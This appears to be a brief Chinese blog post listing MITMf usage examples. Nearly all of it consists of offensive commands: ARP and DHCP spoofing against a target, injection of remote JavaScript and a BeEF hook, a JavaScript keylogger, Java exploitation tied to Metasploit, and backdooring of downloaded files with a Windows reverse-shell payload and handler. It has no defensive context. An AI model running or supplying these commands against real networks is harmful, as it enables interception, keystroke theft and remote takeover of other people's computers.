Mitmf使用技巧

git clone https://github.com/byt3bl33d3r/MITMf.git /opt/mitmf/

1.
./mitmf.py –iface eth0 –spoof –arp –gateway 192.168.217.2 –target 192.168.217.129 –inject –html-url http://www.freebuf.com

2.
./mitmf.py –iface eth0 –spoof –arp –gateway 192.168.217.2 –target 192.168.217.129 –inject –js-url http://linvex.xxx.cn/test.js

3.
./mitmf.py –iface eth0 –spoof –arp –gateway 192.168.217.2 –target 192.168.217.129 –jskeylogger

4.
#msfconsole
msf > load msgrpc Pass=abc123

./mitmf.py –iface eth0 –spoof –arp –gateway 192.168.217.2 –target 192.168.217.129 –javapwn –msfip 192.168.217.137

5.
msfconsole
use exploit/multi/handler
set LHOST 192.168.217.137
set LPORT 1447
run

/usr/share/mitmf/config/mitmf.conf
…………SNIP…………
[[[WindowsIntelx86]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
HOST = 192.168.217.137
PORT = 1447
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = None
ZERO_CERT = False
PATCH_DLL = True
MSFPAYLOAD = windows/shell_reverse_tcp
…………SNIP…………

./mitmf.py –iface eth0 –spoof –arp –gateway 192.168.217.2 –target 192.168.217.129 –filepwn

6.
./mitmf.py –iface eth0 –spoof –dhcp –shellshock

7.
mitmf -i eth0 –spoof –arp –gateway 192.168.1.1 –target 192.168.1.126 –screen

8.
一个键盘记录js。有SSL的网站无法记录
mitmf -i eth0 –spoof –arp –gateway 192.168.1.1 –target 192.168.1.126 –browserprofiler

9.
恶搞模块,让浏览器的图片翻转。
mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.126 –upsidedownternet

10.
xss with beef
mitmf -i eth0 –spoof –arp –gateway 192.168.1.1 –target 192.168.1.126 –inject –js-url http://192.168.1.158:3000/hook.js

posted @ 2019-01-06 18:53  heycomputer  阅读(532)  评论(0编辑  收藏  举报